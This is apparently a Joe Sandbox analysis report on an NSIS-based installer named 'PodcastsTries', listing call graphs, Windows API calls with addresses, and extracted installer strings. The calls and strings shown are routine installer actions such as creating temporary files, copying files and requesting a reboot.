406328 3 API calls 3897->3898 3899 4038f2 SHGetFileInfoW 3898->3899 3971 406035 lstrcpynW 3899->3971 3901 40391d GetCommandLineW 3972 406035 lstrcpynW 3901->3972 3903 40392f GetModuleHandleW 3904 403947 3903->3904 3905 405d32 CharNextW 3904->3905 3906 403956 CharNextW 3905->3906 3917 403968 3906->3917 3907 403a02 3908 403a21 GetTempPathW 3907->3908 3973 4037f8 3908->3973 3910 403a37 3912 403a3b GetWindowsDirectoryW lstrcatW 3910->3912 3913 403a5f DeleteFileW 3910->3913 3911 405d32 CharNextW 3911->3917 3915 4037f8 11 API calls 3912->3915 3981 4035b3 GetTickCount GetModuleFileNameW 3913->3981 3918 403a57 3915->3918 3916 403a73 3919 403af8 3916->3919 3921 405d32 CharNextW 3916->3921 3957 403add 3916->3957 3917->3907 3917->3911 3924 403a04 3917->3924 3918->3913 3918->3919 4066 403885 3919->4066 3925 403a8a 3921->3925 4073 406035 lstrcpynW 3924->4073 3936 403b23 lstrcatW lstrcmpiW 3925->3936 3937 403ab5 3925->3937 3926 403aed 3929 406113 9 API calls 3926->3929 3927 403bfa 3930 403c7d 3927->3930 3932 406328 3 API calls 3927->3932 3928 403b0d 3931 405ccc MessageBoxIndirectW 3928->3931 3929->3919 3933 403b1b ExitProcess 3931->3933 3935 403c09 3932->3935 3939 406328 3 API calls 3935->3939 3936->3919 3938 403b3f CreateDirectoryW SetCurrentDirectoryW 3936->3938 4074 4067aa 3937->4074 3941 403b62 3938->3941 3942 403b57 3938->3942 3943 403c12 3939->3943 4091 406035 lstrcpynW 3941->4091 4090 406035 lstrcpynW 3942->4090 3947 406328 3 API calls 3943->3947 3950 403c1b 3947->3950 3949 403b70 4092 406035 lstrcpynW 3949->4092 3951 403c69 ExitWindowsEx 3950->3951 3956 403c29 GetCurrentProcess 3950->3956 3951->3930 3955 403c76 3951->3955 3952 403ad2 4089 406035 lstrcpynW 3952->4089 3958 40141d 80 API calls 3955->3958 3960 403c39 3956->3960 4009 405958 3957->4009 3958->3930 3959 406831 18 API calls 3961 403b98 DeleteFileW 3959->3961 3960->3951 3962 403ba5 CopyFileW 3961->3962 3968 403b7f 3961->3968 3962->3968 3963 403bee 3964 406c94 42 API calls 3963->3964 3966 403bf5 3964->3966 3965 
406c94 42 API calls 3965->3968 3966->3919 3967 406831 18 API calls 3967->3968 3968->3959 3968->3963 3968->3965 3968->3967 3970 403bd9 CloseHandle 3968->3970 4093 405c6b CreateProcessW 3968->4093 3970->3968 3971->3901 3972->3903 3974 406064 5 API calls 3973->3974 3975 403804 3974->3975 3976 40380e 3975->3976 3977 40674e 3 API calls 3975->3977 3976->3910 3978 403816 CreateDirectoryW 3977->3978 4096 405eab 3978->4096 4100 405e7c GetFileAttributesW CreateFileW 3981->4100 3983 4035f3 4003 403603 3983->4003 4101 406035 lstrcpynW 3983->4101 3985 403619 4102 40677d lstrlenW 3985->4102 3989 40362a GetFileSize 3990 403726 3989->3990 4004 403641 3989->4004 4107 4032d2 3990->4107 3992 40372f 3994 40376b GlobalAlloc 3992->3994 3992->4003 4119 403368 SetFilePointer 3992->4119 3993 403336 ReadFile 3993->4004 4118 403368 SetFilePointer 3994->4118 3997 4037e9 4000 4032d2 6 API calls 3997->4000 3998 403786 4001 40337f 33 API calls 3998->4001 3999 40374c 4002 403336 ReadFile 3999->4002 4000->4003 4007 403792 4001->4007 4006 403757 4002->4006 4003->3916 4004->3990 4004->3993 4004->3997 4004->4003 4005 4032d2 6 API calls 4004->4005 4005->4004 4006->3994 4006->4003 4007->4003 4007->4007 4008 4037c0 SetFilePointer 4007->4008 4008->4003 4010 406328 3 API calls 4009->4010 4011 40596c 4010->4011 4012 405972 4011->4012 4013 405984 4011->4013 4133 405f7d wsprintfW 4012->4133 4014 405eff 3 API calls 4013->4014 4015 4059b5 4014->4015 4017 4059d4 lstrcatW 4015->4017 4019 405eff 3 API calls 4015->4019 4018 405982 4017->4018 4124 403ec1 4018->4124 4019->4017 4022 4067aa 18 API calls 4023 405a06 4022->4023 4024 405a9c 4023->4024 4026 405eff 3 API calls 4023->4026 4025 4067aa 18 API calls 4024->4025 4027 405aa2 4025->4027 4028 405a38 4026->4028 4029 405ab2 4027->4029 4030 406831 18 API calls 4027->4030 4028->4024 4032 405a5b lstrlenW 4028->4032 4035 405d32 CharNextW 4028->4035 4031 405ad2 LoadImageW 4029->4031 4135 403ea0 4029->4135 4030->4029 4033 405b92 4031->4033 4034 405afd RegisterClassW 
4031->4034 4036 405a69 lstrcmpiW 4032->4036 4037 405a8f 4032->4037 4041 40141d 80 API calls 4033->4041 4039 405b9c 4034->4039 4040 405b45 SystemParametersInfoW CreateWindowExW 4034->4040 4042 405a56 4035->4042 4036->4037 4043 405a79 GetFileAttributesW 4036->4043 4045 40674e 3 API calls 4037->4045 4039->3926 4040->4033 4046 405b98 4041->4046 4042->4032 4047 405a85 4043->4047 4044 405ac8 4044->4031 4048 405a95 4045->4048 4046->4039 4049 403ec1 19 API calls 4046->4049 4047->4037 4050 40677d 2 API calls 4047->4050 4134 406035 lstrcpynW 4048->4134 4052 405ba9 4049->4052 4050->4037 4053 405bb5 ShowWindow LoadLibraryW 4052->4053 4054 405c38 4052->4054 4055 405bd4 LoadLibraryW 4053->4055 4056 405bdb GetClassInfoW 4053->4056 4057 405073 83 API calls 4054->4057 4055->4056 4058 405c05 DialogBoxParamW 4056->4058 4059 405bef GetClassInfoW RegisterClassW 4056->4059 4060 405c3e 4057->4060 4063 40141d 80 API calls 4058->4063 4059->4058 4061 405c42 4060->4061 4062 405c5a 4060->4062 4061->4039 4065 40141d 80 API calls 4061->4065 4064 40141d 80 API calls 4062->4064 4063->4039 4064->4039 4065->4039 4067 40389d 4066->4067 4068 40388f CloseHandle 4066->4068 4142 403caf 4067->4142 4068->4067 4073->3908 4195 406035 lstrcpynW 4074->4195 4076 4067bb 4077 405d85 4 API calls 4076->4077 4078 4067c1 4077->4078 4079 406064 5 API calls 4078->4079 4086 403ac3 4078->4086 4082 4067d1 4079->4082 4080 406809 lstrlenW 4081 406810 4080->4081 4080->4082 4084 40674e 3 API calls 4081->4084 4082->4080 4083 406301 2 API calls 4082->4083 4082->4086 4087 40677d 2 API calls 4082->4087 4083->4082 4085 406816 GetFileAttributesW 4084->4085 4085->4086 4086->3919 4088 406035 lstrcpynW 4086->4088 4087->4080 4088->3952 4089->3957 4090->3941 4091->3949 4092->3968 4094 405ca6 4093->4094 4095 405c9a CloseHandle 4093->4095 4094->3968 4095->4094 4097 405eb8 GetTickCount GetTempFileNameW 4096->4097 4098 40382a 4097->4098 4099 405eee 4097->4099 4098->3910 4099->4097 4099->4098 4100->3983 4101->3985 4103 40678c 4102->4103 
4104 406792 CharPrevW 4103->4104 4105 40361f 4103->4105 4104->4103 4104->4105 4106 406035 lstrcpynW 4105->4106 4106->3989 4108 4032f3 4107->4108 4109 4032db 4107->4109 4112 403303 GetTickCount 4108->4112 4113 4032fb 4108->4113 4110 4032e4 DestroyWindow 4109->4110 4111 4032eb 4109->4111 4110->4111 4111->3992 4115 403311 CreateDialogParamW ShowWindow 4112->4115 4116 403334 4112->4116 4120 40635e 4113->4120 4115->4116 4116->3992 4118->3998 4119->3999 4121 40637b PeekMessageW 4120->4121 4122 406371 DispatchMessageW 4121->4122 4123 403301 4121->4123 4122->4121 4123->3992 4125 403ed5 4124->4125 4140 405f7d wsprintfW 4125->4140 4127 403f49 4128 406831 18 API calls 4127->4128 4129 403f55 SetWindowTextW 4128->4129 4130 403f70 4129->4130 4131 403f8b 4130->4131 4132 406831 18 API calls 4130->4132 4131->4022 4132->4130 4133->4018 4134->4024 4141 406035 lstrcpynW 4135->4141 4137 403eb4 4138 40674e 3 API calls 4137->4138 4139 403eba lstrcatW 4138->4139 4139->4044 4140->4127 4141->4137 4143 403cbd 4142->4143 4144 4038a2 4143->4144 4145 403cc2 FreeLibrary GlobalFree 4143->4145 4146 406cc7 4144->4146 4145->4144 4145->4145 4147 4067aa 18 API calls 4146->4147 4148 406cda 4147->4148 4149 406ce3 DeleteFileW 4148->4149 4150 406cfa 4148->4150 4189 4038ae CoUninitialize 4149->4189 4151 406e77 4150->4151 4193 406035 lstrcpynW 4150->4193 4157 406301 2 API calls 4151->4157 4177 406e84 4151->4177 4151->4189 4153 406d25 4154 406d39 4153->4154 4155 406d2f lstrcatW 4153->4155 4158 40677d 2 API calls 4154->4158 4156 406d3f 4155->4156 4160 406d4f lstrcatW 4156->4160 4162 406d57 lstrlenW FindFirstFileW 4156->4162 4159 406e90 4157->4159 4158->4156 4163 40674e 3 API calls 4159->4163 4159->4189 4160->4162 4161 4062cf 11 API calls 4161->4189 4166 406e67 4162->4166 4190 406d7e 4162->4190 4164 406e9a 4163->4164 4167 4062cf 11 API calls 4164->4167 4165 405d32 CharNextW 4165->4190 4166->4151 4168 406ea5 4167->4168 4169 405e5c 2 API calls 4168->4169 4170 406ead RemoveDirectoryW 4169->4170 4174 406ef0 

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426176,762323A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                                                                                                                                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                                                                                                                                                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 0040543D
                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: New install of "%s" to "%s"${
                                                                                                                                                                                                                                                                                                          • API String ID: 2110491804-1641061399

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • #17.COMCTL32 ref: 004038CE
                                                                                                                                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                                          • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                          • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                                                                                                                                                                          • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                                                                                                                                                                          • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                                                                                                                                                          • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                                                                                                                                                          • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                                                                                                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                                                          • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                                                                                                                                                                          • API String ID: 2435955865-3712954417
                                                                                                                                                                                                                                                                                                          • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                                                          • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                                                          • String ID: jF
                                                                                                                                                                                                                                                                                                          • API String ID: 2295610775-3349280890
                                                                                                                                                                                                                                                                                                          • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                                                          • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 310444273-0

Control-flow Graph

[Graph data not reproduced; first block 4015a0-4015f4.]
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                                                                                                                                          • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                                                                                                                                          • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                                                                                                                                          • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                                                                                                                                          • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                                                                                                                                          • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                                                                                                                                                          • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                                                                                                                                                          • detailprint: %s, xrefs: 00401679
                                                                                                                                                                                                                                                                                                          • Jump: %d, xrefs: 00401602
                                                                                                                                                                                                                                                                                                          • Call: %d, xrefs: 0040165A
                                                                                                                                                                                                                                                                                                          • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                                                                                                                                          • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                                                                                                                                                          • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                                                                                                                                                          • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                                                                                                                                          • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                                                                                                                                                          • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                                                                                                                                          • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                                                                                                                                                          • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                                                                                                                                                          • BringToFront, xrefs: 004016BD
                                                                                                                                                                                                                                                                                                          • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                                                                                                                                          • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                                                                                                                                          • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                                                                                                                                                          • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                                                                                                                                                          • API String ID: 2872004960-3619442763

Control-flow Graph

[Graph data not reproduced; first block 4054a5-4054b7.]
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                                                                                                                                                                                          • DestroyWindow.USER32 ref: 00405512
                                                                                                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                                                                                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                                                                                                                                                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                                                                                                                                                                                          • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                                                                                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                                                                                                                                                                          • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
